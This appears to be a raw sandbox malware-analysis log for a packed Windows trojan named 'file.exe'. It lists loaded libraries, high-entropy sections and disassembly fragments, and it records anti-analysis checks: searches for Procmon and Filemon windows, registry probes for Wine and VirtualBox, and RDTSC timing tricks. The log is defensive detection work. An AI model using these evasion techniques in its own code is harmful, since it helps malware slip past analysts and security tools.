    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001386F00_2_001386F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0028F72B0_2_0028F72B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C97BA0_2_002C97BA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002137D20_2_002137D2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000FA8500_2_000FA850
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001218600_2_00121860
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BA8A10_2_002BA8A1
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012E8A00_2_0012E8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012B8C00_2_0012B8C0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AD8CE0_2_002AD8CE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011098B0_2_0011098B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001389A00_2_001389A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AF9CC0_2_002AF9CC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C4A230_2_002C4A23
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134A400_2_00134A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00138A800_2_00138A80
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00137AB00_2_00137AB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E2B4E0_2_001E2B4E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00208B4A0_2_00208B4A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0010DB6F0_2_0010DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F7BF00_2_000F7BF0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00138C020_2_00138C02
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00136CBF0_2_00136CBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011CCD00_2_0011CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011FD100_2_0011FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C7D310_2_002C7D31
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011DD290_2_0011DD29
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024DD600_2_0024DD60
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00118D620_2_00118D62
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0020ED9D0_2_0020ED9D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00104E2A0_2_00104E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011AE570_2_0011AE57
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00138E700_2_00138E70
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BDE5E0_2_002BDE5E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A4E830_2_002A4E83
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00106EBF0_2_00106EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000FBEB00_2_000FBEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00223EEC0_2_00223EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000FAF100_2_000FAF10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013EF530_2_0013EF53
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001ABF600_2_001ABF60
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002FDFAF0_2_002FDFAF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C2FB60_2_002C2FB6
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00137FC00_2_00137FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F8FD00_2_000F8FD0
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 000FCAA0 appears 48 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0010D300 appears 152 times
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9996067966171617
    Source: file.exeStatic PE information: Section: wwrljzle ZLIB complexity 0.9941454430696886
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@10/2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00128220 CoCreateInstance,0_2_00128220
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 1830400 > 1048576
    Source: file.exeStatic PE information: Raw size of wwrljzle is bigger than: 0x100000 < 0x195600

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wwrljzle:EW;uvlyxxks:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wwrljzle:EW;uvlyxxks:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1ce1c2 should be: 0x1c59f8
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: wwrljzle
    Source: file.exeStatic PE information: section name: uvlyxxks
    Source: file.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0033A025 push 76E1B9FAh; mov dword ptr [esp], eax0_2_0033A089
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00389014 push eax; mov dword ptr [esp], edi0_2_00389205
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031F004 push edi; mov dword ptr [esp], edx0_2_0031F38B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00374069 push 0D1EB938h; mov dword ptr [esp], esp0_2_0037408D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C20AF push 684929E1h; mov dword ptr [esp], ecx0_2_003C2189
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002DF096 push ecx; mov dword ptr [esp], eax0_2_002E1133
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CF1B8 push ebp; mov dword ptr [esp], ebx0_2_002CF1F8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002DD1E9 push ebx; mov dword ptr [esp], 5B667617h0_2_002DD215
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001561D2 push eax; mov dword ptr [esp], ecx0_2_00157E62
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B122F push edi; mov dword ptr [esp], ebx0_2_003B1246
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002FE230 push edx; mov dword ptr [esp], 4068A2D8h0_2_002FE25F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 1E14D63Eh; mov dword ptr [esp], edx0_2_002CB272
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 68D9E916h; mov dword ptr [esp], ebx0_2_002CB2F7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push esi; mov dword ptr [esp], esp0_2_002CB30A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push edi; mov dword ptr [esp], esi0_2_002CB324
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push edi; mov dword ptr [esp], ebx0_2_002CB389
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push edi; mov dword ptr [esp], edx0_2_002CB3AE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 4C3B281Eh; mov dword ptr [esp], esp0_2_002CB40B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push edx; mov dword ptr [esp], esi0_2_002CB40F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push ebx; mov dword ptr [esp], edi0_2_002CB4BA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 50400CC9h; mov dword ptr [esp], ebx0_2_002CB55B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 5214FCBEh; mov dword ptr [esp], edx0_2_002CB5F3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push eax; mov dword ptr [esp], esp0_2_002CB5F7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push ecx; mov dword ptr [esp], 47FBDF80h0_2_002CB635
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push eax; mov dword ptr [esp], edx0_2_002CB63E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 36C6A083h; mov dword ptr [esp], edi0_2_002CB68D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 31DFD9D1h; mov dword ptr [esp], ebp0_2_002CB6C0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 49F91773h; mov dword ptr [esp], edi0_2_002CB757
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 74933F97h; mov dword ptr [esp], esp0_2_002CB76C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push ecx; mov dword ptr [esp], ebp0_2_002CB7BF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002CB26A push 27D43719h; mov dword ptr [esp], ebx0_2_002CB7D9
    Source: file.exeStatic PE information: section name: entropy: 7.984430674001358
    Source: file.exeStatic PE information: section name: wwrljzle entropy: 7.95266308333564

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 154162 second address: 154166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 154166 second address: 15416C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 15416C second address: 1539EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor dword ptr [ebp+122D2018h], edx 0x00000012 pushad 0x00000013 mov eax, dword ptr [ebp+122D36C2h] 0x00000019 or eax, dword ptr [ebp+122D38F6h] 0x0000001f popad 0x00000020 push dword ptr [ebp+122D1531h] 0x00000026 pushad 0x00000027 adc edx, 5FBB9F0Dh 0x0000002d mov edx, 2EDF008Ah 0x00000032 popad 0x00000033 call dword ptr [ebp+122D1B66h] 0x00000039 pushad 0x0000003a pushad 0x0000003b pushad 0x0000003c jng 00007F65504F5A46h 0x00000042 mov bx, cx 0x00000045 popad 0x00000046 popad 0x00000047 xor eax, eax 0x00000049 mov dword ptr [ebp+122D211Dh], edx 0x0000004f mov edx, dword ptr [esp+28h] 0x00000053 jo 00007F65504F5A4Ch 0x00000059 or dword ptr [ebp+122D2032h], eax 0x0000005f mov dword ptr [ebp+122D35BAh], eax 0x00000065 stc 0x00000066 mov esi, 0000003Ch 0x0000006b jmp 00007F65504F5A50h 0x00000070 mov dword ptr [ebp+122D203Eh], edx 0x00000076 add esi, dword ptr [esp+24h] 0x0000007a jns 00007F65504F5A4Ch 0x00000080 lodsw 0x00000082 sub dword ptr [ebp+122D2032h], edi 0x00000088 add eax, dword ptr [esp+24h] 0x0000008c xor dword ptr [ebp+122D203Eh], ecx 0x00000092 mov ebx, dword ptr [esp+24h] 0x00000096 mov dword ptr [ebp+122D203Eh], edx 0x0000009c mov dword ptr [ebp+122D211Dh], edx 0x000000a2 push eax 0x000000a3 push ecx 0x000000a4 push eax 0x000000a5 push edx 0x000000a6 pushad 0x000000a7 popad 0x000000a8 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BBF83 second address: 2BBF9D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push esi 0x0000000c pushad 0x0000000d jmp 00007F655118F74Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BBF9D second address: 2BBFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEDFF second address: 2CEE09 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F655118F74Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEF8A second address: 2CEF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F65504F5A46h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEF95 second address: 2CEFA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F655118F746h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF586 second address: 2CF58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF58A second address: 2CF58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF58E second address: 2CF59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF6CD second address: 2CF6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF6D3 second address: 2CF6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D32DB second address: 2D32E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D32E0 second address: 2D32E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D32E6 second address: 2D332E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jbe 00007F655118F750h 0x0000000f jmp 00007F655118F74Ah 0x00000014 pop edi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007F655118F752h 0x0000001f jns 00007F655118F748h 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F655118F74Ah 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D332E second address: 2D3333 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3333 second address: 2D3343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3343 second address: 2D3347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3347 second address: 2D3365 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F655118F752h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3365 second address: 2D3369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3369 second address: 1539EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 sbb cl, FFFFFFCFh 0x0000000b je 00007F655118F749h 0x00000011 movsx edx, cx 0x00000014 push dword ptr [ebp+122D1531h] 0x0000001a jmp 00007F655118F750h 0x0000001f call dword ptr [ebp+122D1B66h] 0x00000025 pushad 0x00000026 pushad 0x00000027 pushad 0x00000028 jng 00007F655118F746h 0x0000002e mov bx, cx 0x00000031 popad 0x00000032 popad 0x00000033 xor eax, eax 0x00000035 mov dword ptr [ebp+122D211Dh], edx 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f jo 00007F655118F74Ch 0x00000045 or dword ptr [ebp+122D2032h], eax 0x0000004b mov dword ptr [ebp+122D35BAh], eax 0x00000051 stc 0x00000052 mov esi, 0000003Ch 0x00000057 jmp 00007F655118F750h 0x0000005c mov dword ptr [ebp+122D203Eh], edx 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 jns 00007F655118F74Ch 0x0000006c lodsw 0x0000006e sub dword ptr [ebp+122D2032h], edi 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 xor dword ptr [ebp+122D203Eh], ecx 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D203Eh], edx 0x00000088 mov dword ptr [ebp+122D211Dh], edx 0x0000008e push eax 0x0000008f push ecx 0x00000090 push eax 0x00000091 push edx 0x00000092 pushad 0x00000093 popad 0x00000094 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D34C1 second address: 2D351E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F65504F5A4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jne 00007F65504F5A48h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007F65504F5A46h 0x0000001c popad 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push edi 0x00000023 pushad 0x00000024 jnc 00007F65504F5A46h 0x0000002a jo 00007F65504F5A46h 0x00000030 popad 0x00000031 pop edi 0x00000032 pop eax 0x00000033 add edi, dword ptr [ebp+122D2BCFh] 0x00000039 lea ebx, dword ptr [ebp+1245322Bh] 0x0000003f mov esi, dword ptr [ebp+122D377Eh] 0x00000045 pushad 0x00000046 mov dword ptr [ebp+122D1F60h], edi 0x0000004c mov edx, esi 0x0000004e popad 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D35FE second address: 2D3693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push esi 0x0000000a jmp 00007F655118F758h 0x0000000f pop esi 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F655118F756h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007F655118F752h 0x00000020 pop eax 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D1F0Ah], edx 0x00000029 mov cx, F4DCh 0x0000002d push 00000000h 0x0000002f sbb dl, 00000055h 0x00000032 push 00000003h 0x00000034 call 00007F655118F755h 0x00000039 call 00007F655118F74Ah 0x0000003e mov dword ptr [ebp+122D202Eh], ecx 0x00000044 pop ecx 0x00000045 pop esi 0x00000046 push 8E2C18F2h 0x0000004b push edx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D371E second address: 2D3723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3723 second address: 2D376D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F752h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add di, 524Fh 0x00000011 push 00000000h 0x00000013 mov esi, 180DD2D6h 0x00000018 call 00007F655118F749h 0x0000001d jmp 00007F655118F74Bh 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F655118F74Dh 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D376D second address: 2D37C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F65504F5A4Ch 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F65504F5A4Fh 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007F65504F5A53h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jnc 00007F65504F5A48h 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D37C8 second address: 2D37CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D37CF second address: 2D3856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 add dword ptr [ebp+122D1EEDh], edx 0x0000000e push 00000003h 0x00000010 mov ecx, 13E859BDh 0x00000015 jp 00007F65504F5A4Ch 0x0000001b mov dword ptr [ebp+122D2BC3h], esi 0x00000021 push 00000000h 0x00000023 je 00007F65504F5A46h 0x00000029 push 00000003h 0x0000002b mov dword ptr [ebp+122D1A7Dh], ebx 0x00000031 call 00007F65504F5A49h 0x00000036 jmp 00007F65504F5A50h 0x0000003b push eax 0x0000003c jmp 00007F65504F5A54h 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 push ecx 0x00000046 jc 00007F65504F5A52h 0x0000004c jmp 00007F65504F5A4Ch 0x00000051 pop ecx 0x00000052 mov eax, dword ptr [eax] 0x00000054 je 00007F65504F5A58h 0x0000005a push eax 0x0000005b push edx 0x0000005c jno 00007F65504F5A46h 0x00000062 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3856 second address: 2D3868 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D3868 second address: 2D386E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D386E second address: 2D38B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pop eax 0x00000007 mov edi, dword ptr [ebp+122D35BAh] 0x0000000d jns 00007F655118F74Eh 0x00000013 lea ebx, dword ptr [ebp+1245323Fh] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F655118F748h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 or ecx, dword ptr [ebp+122D2986h] 0x00000039 push eax 0x0000003a pushad 0x0000003b pushad 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E53F9 second address: 2E540D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
